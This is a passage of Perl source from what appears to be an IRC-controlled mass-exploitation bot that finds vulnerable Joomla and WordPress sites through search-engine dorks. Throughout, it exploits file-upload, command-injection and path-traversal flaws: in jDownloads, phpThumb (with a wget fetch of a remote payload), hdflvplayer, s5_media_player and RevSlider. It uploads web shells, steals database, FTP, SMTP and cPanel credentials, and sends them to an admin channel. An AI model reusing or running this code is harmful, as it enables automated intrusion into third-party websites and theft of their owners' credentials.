sleep(int(rand(3))); &msg("$channel","![7$engine]! [ 4Finder Success 3OK! ]"); &msg("$admin","15[4+12$engine4+15] 11$result[0] OS: $result[1] SAFEMODE:4$result[2] "); } } &shellx($chan,$site,$engine,$nick,$logo); } exit; } } } } } sub ftp_connect { my $site = $_[0]; my $user = $_[1]; my $pass = $_[2]; my $chan = $_[3]; my $logo = $_[4]; #my $debug = $_[5]; my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { &msg("$channel","![ 10FTP ]! 14[ 8http://".$site." 14] [ 8Found 14] 9Success "); &msg("$admin","![ 10FTP ]! 14[ 8http://".$site." 14] [ 8".$user." : ".$pass." 14] 9Success "); } else { &msg("$channel","![ 10FTP ]! 15[ 10http://".$site." 15] 4Denied "); } } sub get_all() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => &randomagent()); $ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res; } sub dol_query() { my $target = $_[0]; my $code = $_[1]; my $browser = LWP::UserAgent->new; my $res = $browser->post($target."tmp/0x4148fo.php",['0x4148'=> encode_base64($code)],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub dolphin() { my $url = $_[0]; my $body = $_[1]; my $vuln = $url; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ($query eq "") { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; my $sget = "POST $query HTTP/1.1\r\n"; $sget .= "Host: $host\r\n"; $sget .= "Referer: $vuln\r\n"; $sget .= "Cookie: memberID=1; memberPassword[]=0x4148;\r\n"; $sget .= "Content-Length: 557\r\n"; $sget .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"; $sget .= "User-Agent: Mozilla 15\r\n"; $sget .= "Content-Type: multipart/form-data; boundary=---------------------------\r\n\r\n"; $sget .= $body; print $sock $sget; my @pages = <$sock>; $page = "@pages"; close($sock); }; return $page; } ##################################################coba##################################################### sub jdown() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jdlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $target = "http://".$site.$bug; my $crut = &jd_upload($target,"style.php.j"); if ($crut == 1) { my $shell = "http://".$site."images/jdownloads/screenshots/style.php.j"; my $check = &get_content($shell."?220"); if ($check =~ /GIF89a/){ my ($safe,$os,$uid,$host,$user,$pass); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [ 12sHeLL ^_^ 2 $safe $os $uid ]"); &msg("$admin","$jomlogo 12sHeLL $shell ^_^ 2 $safe $os $uid "); my $loadbot = &jd_upload($target,"style.php.j"); &get_content("http://".$site."images/jdownloads/screenshots/style.php.j"); my $loadbot2 = &jd_upload($target,"style.php.j"); &get_content("http://".$site."images/jdownloads/screenshots/style.php.j"); $target =~ s/http:\/\///; $target =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; if ($check =~ m/\$ftp_host = '(.+?)';/i){$host=$1;} if ($check =~ m/\$ftp_user = '(.+?)';/i){$user=$1;} if ($check =~ m/\$ftp_pass = '(.+?)';/i){$pass=$1;} if ($host =~ /127.0.0.1/) { $host = $target} &msg("$channel","![7$engine]! [ 9Payload executed ]"); if ($user =~ /_/) { my @userz = split("_", $user); $user = $userz[0];} my $success = 1; use Net::FTP; eval { my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; }; if ($success == 0) { &msg("$admin","12[2FTP15] [ 1http://".$host." 12] [".$user." : ".$pass."15] 1Success "); } } } } exit; } } sub jd_upload() { my $target = $_[0]; my $file = $_[1]; my $retx = 0; my $aplod = LWP::UserAgent->new; my $res = $aplod-> post($target, [ 'name' => "xXx", 'mail' => 'gomoney742@gmail.com', 'catlist' => "1", 'file_upload' => ['./image.zip' => 'image.zip' => 'application/octet-stream'], 'filetitle' => "xXx", 'description' => 'id', 'send' => "1", 'senden' => "Send file", 'description' => 'XxX', 'option' => "com_jdownloads", 'view' => "upload", 'pic_upload' => ['./'.$file => $file => 'application/octet-stream'], ], 'Content-Type' => 'form-data'); my $hasil = $res->content; if ($hasil =~ /color="green"/i) { $retx = 1; return $retx; } } ############################################################################################## sub joomla() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $agent->timeout(10); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101Firefox/14.0.1'); my $shell = "wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.jpg;wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.php"; my $website = "http://".$site."components/com_alphauserpoints/assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; my $request = $agent->request(HTTP::Request->new(GET=>$website)); my $cwebsite = "http://".$site."components/com_alphauserpoints/assets/phpThumb/style.jpg"; my $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { my $mvwebsite = "http://".$site."components/com_alphauserpoints/assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv style.jpg style.php ; &phpThumbDebug=9"; my $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); my $xmlrpc = "http://".$site."components/com_alphauserpoints/assets/phpThumb/style.php"; my $c2req = $agent->request(HTTP::Request->new(GET=>$xmlrpc)); if ($c2req->is_success) { my $check = &get_content("http://".$site."components/com_alphauserpoints/assets/phpThumb/style.php?love"); sleep(2); if ($check =~ m/404 Not Found/ig) { #&msg("$chanxxx","![9X]! 10$site "); sleep(3); my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$alplogo15(7@2$engine15)(7@2SheLL15)3 $xmlrpc 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); &msg("$nick","$alplogo15(7@2$engine15)(7@2SheLL15)3 $xmlrpc 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); &msg("$channel","![7$engine]! [3 Shell 14$safe 15$os ]"); } } } } } } sub hdf() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$hdflogo); my $num = scalar(@list); if ($num > 0){ foreach my $site(@list){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Finish.. ]"); } my $site2 = $site; $site2 =~ s/administrator\/.*//; $site2 =~ s/components\/.*//; $site2 =~ s/index.php\.*//; $site2 =~ s/index\.php\?option\=com_hdflvplayer.*//; my $target = "http://".$site; if ($target =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $sitexx = $2} my @sitez = ("$site2","$sitexx"); foreach my $sitex(@sitez) { my $pathdb = "http://".$sitex."/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php"; my $pathcnf = "http://".$sitex."/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../../.my.cnf"; my $pathcnf2 = "http://".$sitex."/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../../../.my.cnf"; my $pathcnf3 = "http://".$sitex."/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../../../../.my.cnf"; my $check = &get_content($pathdb); if ($check =~ m/smtphost/g && $check =~ m/smtpuser/g || $check =~ m/smtppass/g ) { if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;} if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;} if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;} if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;} if ($check =~ m/\$smtpport = '(.+?)';/i){$smtpport=$1;} if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;} if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;} if ($check =~ m/\$host = '(.+?)';/i){$dbhost=$1;} if ($check =~ m/\$user = '(.+?)';/i){$dbuser=$1;} if ($check =~ m/\$password = '(.+?)';/i){$dbpass=$1;} if ($check =~ m/\$db = '(.+?)';/i){$dbname=$1;} if ($check =~ m/\/home\/(.+?)\//g){$user=$1;} &msg("$channel","![9X]!2 Database 7Host:3 $dbhost 1| 7User:3 $dbuser 1| 7Pass:3 Priv8 "); if ($ftpuser =~ /_/) { @userz = split(/_/,$ftpuser); $ftpuser = $userz[0]; } my $success = 1; use Net::FTP; eval { my $ftp = Net::FTP->new($site2, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($ftpuser,$ftppass); $ftp->quit; }; if ($success == 0) { &msg("$channel","15[8FTP15] [ 9http://".$site2." 15] 9Success "); &msg("$admin","15,1[8FTP15] [ 9https://".$site2." 15] [11 ".$ftpuser." : ".$ftppass."15 ] 9Success "); } &dbi_connect($dbhost,$dbuser,$dbpass,$dbname,$chan,$engine,$hdflogo,$sitex);sleep(3); &cnfx2($pathcnf,$chan,$sitex,$engine,$hdflogo); &cnfx2($pathcnf2,$chan,$sitex,$engine,$hdflogo); &cnfx2($pathcnf3,$chan,$sitex,$engine,$hdflogo); &ftp_connect("http://target.com",$sitex,$user,$dbpass,$chan,$engine); &msg("$channel","![4VULN-DATABASE]! 15DB: 12http://$sitex 14| 15DB4user9=14 $dbuser 15DB4pass9=4 priv8 15DB4name9=14 $dbname"); &msg("$admin","$hdflogo SMTP 9https://$sitex 14| 159 $smtphost :$smtpport 15smtpuser9= $smtpuser 15smtppass9=$smtppass "); &msg("$channel","![4VULN-SMTP]! 9http://$sitex 14| 15 $smtphost 9:15 $smtpport "); &msg("$admin","$hdflogo 12cPanel 9https://$sitex:2083 14| 15 $user :14 $dbpass "); } &jdb_exploitx($chan,$site,$engine,$nick,$hdflogo); } } } } sub jdb_exploitx() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $nick = $_[3]; my $logo = $_[4]; my $site2 = $site; $site2 =~ s/administrator\/.*//; $site2 =~ s/components\/.*//; $site2 =~ s/logs\/.*//; $site2 =~ s/plugins\/.*//; my $target = "http://".$site; if ($target =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $sitexx = $2} my @sitez = ("$site2","$sitexx"); foreach my $sitex(@sitez) { my $pathdb = "http://".$sitex."/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA="; my $pathcnf = "http://".$sitex."/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vLi4vLm15LmNuZg=="; my $pathcnf2 = "http://".$sitex."//plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vLi4vLi4vLm15LmNuZg=="; my $check = &get_content($pathdb); if ($check =~ m/smtphost/g && $check =~ m/smtpuser/g || $check =~ m/smtppass/g ) { if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;} if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;} if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;} if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;} if ($check =~ m/\$smtpport = '(.+?)';/i){$smtpport=$1;} if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;} if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;} if ($check =~ m/\$host = '(.+?)';/i){$dbhost=$1;} if ($check =~ m/\$user = '(.+?)';/i){$dbuser=$1;} if ($check =~ m/\$password = '(.+?)';/i){$dbpass=$1;} if ($check =~ m/\$db = '(.+?)';/i){$dbname=$1;} if ($check =~ m/\/home\/(.+?)\//g){$user=$1;} &msg("$channel","![9X]!2 Database 7Host:3 $dbhost 1| 7User:3 $dbuser 1| 7Pass:3 Priv8 "); if ($ftpuser =~ /_/) { @userz = split(/_/,$ftpuser); $ftpuser = $userz[0]; } my $success = 1; use Net::FTP; eval { my $ftp = Net::FTP->new($sitex2, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($ftpuser,$ftppass); $ftp->quit; }; if ($success == 0) { &msg("$channel","15[8FTP15] [ 9http://".$site2." 15] 9Success "); &msg("$admin","15[8FTP15] [ 9https://".$site2." 15] [11 ".$ftpuser." : ".$ftppass."15 ] 9Success "); } &dbi_connect($dbhost,$dbuser,$dbpass,$dbname,$chan,$engine,$hdflogo,$sitex);sleep(3); &cnfx2($pathcnf,$chan,$sitex,$engine,$hdflogo); &cnfx2($pathcnf2,$chan,$sitex,$engine,$hdflogo); &ftp_connect("http://target.com",$sitex,$user,$dbpass,$chan,$engine); &msg("$channel","![4VULN-DATABASE]! 15DB: 12http://$sitex 14| 15DB4user9=14 $dbuser 15DB4pass9=14 Admin112 15DB4name9=14 $dbname"); &msg("$admin","$hdflogo SMTP 9https://$sitex 14| 159 $smtphost :$smtpport 15smtpuser9= $smtpuser 15smtppass9= $smtppass "); &msg("$channel","![4VULN-SMTP]! 9http://$sitex 14| 159 $smtphost :$smtpport "); &msg("$admin","$hdflogo 12cPanel 9https://$sitex:2083 14| 15 $user :14 $dbpass "); } } } sub cnfx2() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $logo = $_[4]; my $data = &get_content($url); sleep(10); my $psite = "http://".$site; if ($data =~ m/client/g && $data =~ m/user=/g || $data =~ m/password=/g) { if ($data =~ /(.*)/i ) {$database = $1; } if ($data =~ m/user=(.*)/g) { $userx = $1; } if ($data =~ m/user(.*)/g) { $userx2 = $1; } if ($data =~ m/password=(.*)/g) { $passx = $1; } if ($data =~ m/pass(.*)/g) { $passxx = $1; } if ($data =~ m/pwd(.*)/g) { $pwd = $1; } if ($data =~ m/passwd(.*)/g) { $passwd = $1; } &msg("$channel","![4VULN-cPanel]!14 send To 4$admin "); &msg("$admin","$logo(4,1$engine14) (8cPanel14:4ready14) (11$site 8user $userx $userx2 11pass $passxx $passx $pwd $passwd 6data $database 14)"); sleep(10); } } ################################################################################################# sub revslider() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$revlogo); my $num = scalar(@list); if ($num > 0){ foreach my $site(@list){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $target = "http://".$site."/wp-admin/admin-ajax.php"; my $test = &get_content($target); my $cekftp = $target; $cekftp =~ s/http:\/\///; $cekftp =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cpanz = "http://".$site."/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf"; my $check = &get_content($target."?action=revslider_show_image&img=../wp-config.php"); if ($check =~ /define\('DB_USER'/) { my ($host,$user,$pass,@userz); if ($check =~ /define\('DB_HOST', '(.*)'\);/) { $host = $1; } if ($check =~ /define\('DB_USER', '(.*)'\);/) { $user = $1; } if ($check =~ /define\('DB_PASSWORD', '(.*)'\);/) { $pass = $1; } if ($host =~ /127.0.0.1/) { $host = $cekftp} if ($host =~ /localhost/i) { $host = $cekftp} &msg("$channel","![9X]!2 Database 7Host:3 $host 1| 7User:3 $user 1| 7Pass:3 Priv8 "); if ($user =~ /_/) { @userz = split(/_/,$user); $user = $userz[0]; } my $success = 1; use Net::FTP; eval { my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; }; if ($success == 0) { &cpanx($cpanz,$chan,$site,$engine); &msg("$channel","3[FTP] 4[Success] 7<=> 9Crot to Admin"); &msg("$admin","9[FTP]9 http://".$host." 1 ".$user." 4:9 ".$pass." 3FUCKED"); } else { if ($user =~ /_/) { @users = split("_",$user); $user = $users[0]; &ssh_connect($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &cpanx($cpanz,$chan,$site,$engine); } } } my $aplod = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $aplod->timeout(15); $aplod->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"); my $res = $aplod->post($target, Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]); my $hasil = $res->as_string; if ($hasil =~ /Wrong update extracted folder/) { my $shell = "http://".$site."wp-content/plugins/revslider/temp/update_extract/revslider/info.php"; my $shell2 = "http://".$site."/mils.php"; &msg("$channel","![9X]! 4Payload successfully executed 12[8*12]"); my $check = &get_content($shell."?cek"); &get_all($shell."?cek"); my $check2 = &get_content($shell2."?cek"); &get_all($shell2."?cek"); if ($check =~ m/404 Not Found/ig){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![4REVSLIDER-SHELL]! 11Private Shell 4[1$os4][3safemode10:3$safe4]"); sleep(5); &msg("$admin","![9X]!4 $shell 14[3$os14][3safemode10:3$safe14]"); sleep(5); } elsif ($check2 =~ m/404 Not Found/ig){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$vdlogo5[4-5=4[8$engine4]5=4-5] 4 $shell2 14[1$os14][3safemode10:3$safe14]"); sleep(5); &msg("$channel","![4REVSLIDER-SHELL]! 11Private Shell 4[3$os4][3safemode10:3$safe4]"); sleep(5); } } &cpanx($cpanz,$chan,$site,$engine); &cnfx2($cpanz,$chan,$site,$engine,$logo); &afd($chan,$site,$engine); &ssh_connect($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &shellxx($chan,$site,$engine); &satu_xpl($chan,$site,$engine); &empat_xpl($chan,$site,$engine); } exit; } } } } sub get_all() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => &randomagent()); $ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res; } sub shellxx() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $crota = "http://".$site.".style.php"; my $crotb = "http://".$site."wp-content.php"; my $crotc = "http://".$site."wp-admin/user/reload-x.pHp"; my $crotd = "http://".$site."wp-admin/user/style.php"; my $crote = "http://".$site."wp-content/uploads/black2x.php"; my $crotf = "http://".$site."/magic.gif.php"; my $crotg = "http://".$site.".style.php"; my $jalang = "http://".$site."wp-includes/camfrog.php"; my $croth = "http://".$site."wp-content/plugins/revslider/temp/update_extract/revslider/imgx.php"; my $croti = "http://".$site."wp-indeks.php"; my $crotj = "http://".$site."wp-includes/camfrog.php"; my $html = &get_content($crota); &get_content($crota); &get_content($crotb); &get_content($crotc); &get_content($crotf); my $html1 = &get_content($crotb); my $html2 = &get_content($crotc); my $html3 = &get_content($crotd); my $html4 = &get_content($crote); my $html5 = &get_content($crotf); my $html6 = &get_content($crotg); my $html7 = &get_content($croth); my $html8 = &get_content($croti); my $html9 = &get_content($crotj); if ($html =~ /BArNEr/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![9X]! 8SheLL 2Target Sent to 12$nick 9$safe $os"); &msg("$admin","$vdlogo 15$engine3 [Success]9 $crota 15(OS=$os) $uid"); sleep(2); } if ($html1 =~ /bogel - exploit/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html1 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html1 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html1 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","![9X]! 1$crotb 15(OS=$os) $uid"); sleep(2); &msg("$channel","$vdlogo 15$engine 9SheLL 8Target Sent to 9$nick 8$safe $os"); } if ($html2 =~ /RELOAD-X CREW/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$vdlogo 15$engine9 $crotc 15(OS=$os) $uid"); sleep(2); &msg("$channel","![9X]! 9SheLL 8Target Sent to 4$nick 9$safe $os"); } if ($html3 =~ /bogel - exploit/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html3 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$vdlogo 15$engine9 $crotd 15(OS=$os) $uid"); &msg("$channel","![9X]! 4SheLL 7Target Sent to 4$nick 9$safe $os"); } if ($html4 =~ /budak - exploit/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html4 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html4 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html4 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$vdlogo 15$engine9 $crote 15(OS=$os) $uid"); sleep(2); &msg("$channel","![9X]! 9SheLL 8Target Sent to 9$nick 8$safe $os"); } if ($html5 =~ /BArNEr/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html5 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html5 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html5 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$vdlogo 15$engine9 $crotf 15(OS=$os) $uid"); sleep(2); &msg("$channel","![9X]! 4SheLL 7Target Sent to 4$nick 9$safe $os"); } if ($html6 =~ /Jember - Shell/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html6 =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;} if ($html6 =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;} if ($html6 =~ m/OS : (.*?)<br>/) {$os = $1;} &msg("$admin","$vdlogo 15$engine9 $crotg 15(OS=$os) $uid"); sleep(2); &msg("$channel","$vdlogo 8$engine 4SheLL 7Target Sent to 4$nick 9$safe $os"); } if ($html7 =~ m/ath0 | anaLTEAM.mx/ig) { my $safe = ""; my $os = ""; my $uid = ""; if ($html7 =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;} if ($html7 =~ m/SAFE_MODE is (.*?)<\/b><\/font>/) {$safe = $1;} if ($html7 =~ m/Uname : (.*?)<br>/) {$os = $1;} &msg("$admin","$vdlogo 15$engine9 $croth 15(OS=$os) $uid"); sleep(2); &msg("$channel","![9X]! 4SheLL 7Target Sent to 4$nick 9$safe $os"); } if ($html8 =~ /SexCrime - Shell/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html8 =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;} if ($html8 =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;} if ($html8 =~ m/OS : (.*?)<br>/) {$os = $1;} &msg("$admin","$vdlogo 15$engine9 $croti 15(OS=$os) $uid"); sleep(2); &msg("$channel","![9X]! 4SheLL 7Target Sent to 4$nick 9$safe $os"); } if ($html8 =~ /CamFrog - Shell/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html8 =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;} if ($html8 =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;} if ($html8 =~ m/OS : (.*?)<br>/) {$os = $1;} &msg("$admin","$vdlogo 15$engine9 $jalang 15(OS=$os) $uid"); sleep(2); &msg("$channel","![9X]! 4SheLL 7Target Sent to 4$nick 9$safe $os"); } if ($html9 =~ /GIF89a/i) { my $safe = ""; my $os = ""; my $uid = ""; if ($html10 =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;} if ($html10 =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;} if ($html10 =~ m/OS : (.*?)<br>/) {$os = $1;} &msg("$admin","$vdlogo 15$engine9 $crotj 15(OS=$os) $uid"); sleep(2); &msg("$channel","![9X]! 4SheLL 7Target Sent to 4$nick 9$safe $os"); } } sub satu_xpl() { my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(15); $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"); my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $shell = "http://".$site."wp-content/plugins/revslider/temp/update_extract/revslider/info.php"; my $exploit = $ua->post("$url", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]); my $status = $exploit->as_string; if ($status =~ /Wrong update extracted folder/) { &msg("$channel","![9X]! 2Payload successfully executed 12[8+12]"); my $check = &get_content($shell."?cek"); &get_all($shell."?cek"); if ($check =~ m/404 Not Found/ig){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![4REVSLIDER-SHELL]! 11Private Shell 4[1$os4][3safemode10:3$safe4]"); sleep(5); &msg("$admin","$vdlogo5[4-5=4[8$engine4]5=4-5] 4 $shell 14[3$os14][3safemode10:3$safe14]"); sleep(5); } } } sub empat_xpl() { my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(15); $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"); my @unix = ("/framework/plugins/revslider/temp/update_extract/","/lib/revslider/temp/update_extract/","/script/revslider/temp/update_extract/","/framework/modules/revslider/temp/update_extract/","/revslider/temp/update_extract/","/classes/revslider/temp/update_extract/","/plugins/revslider/temp/update_extract/","/advance/plugins/revslider/temp/update_extract/","/wonderfoundry/addons/plugins/revslider/temp/update_extract/","/revslider/temp/update_extract/","/js/revslider/temp/update_extract/","/minimax/modules/revslider/temp/update_extract/","/library/revslider/temp/update_extract/","/sections/revslider/temp/update_extract/","/framework/tmp/revslider/temp/update_extract/","/Lioit/revslider/temp/update_extract/","/theme/templates/sliders/revslider/temp/update_extract/"); my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $action = "revslider_ajax_action"; my $update_file = "revslider.zip"; my $target = &get_content("http://".$site); if ($target =~ /\/wp-content\/(.*?)\/style\.css/ig){ $sempak = $1; foreach my $black(@unix) { my $shell = "http://".$site."wp-content/".$sempak.$black."/revslider/info.php"; my $exploit = $ua->post("$url", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]); my $status = $exploit->as_string; if ($status =~ /Wrong update extracted folder/) { &msg("$channel","![9X]! 6successfully 12[8+12]"); my $check = &get_content($shell."?cek"); &get_all($shell."?cek"); if ($check =~ m/404 Not Found/ig){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![4REVSLIDER-SHELL]! 11Private Shell 4[1$os4][3safemode10:3$safe4]"); sleep(5); &msg("$admin","$vdlogo5[4-5=4[8$engine4]5=4-5] 4 $shell 14[3$os14][3safemode10:3$safe14]"); sleep(5); } } } } } sub cpanx() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $logo = $_[4]; my $data = &get_content($url); my $psite = "http://".$site; if ($psite =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; } if ($data =~ /user=(.*)/g ) { if ($data =~ /password=(.*)/) { $pass = $1; } if ($data =~ /user=(.*)/) 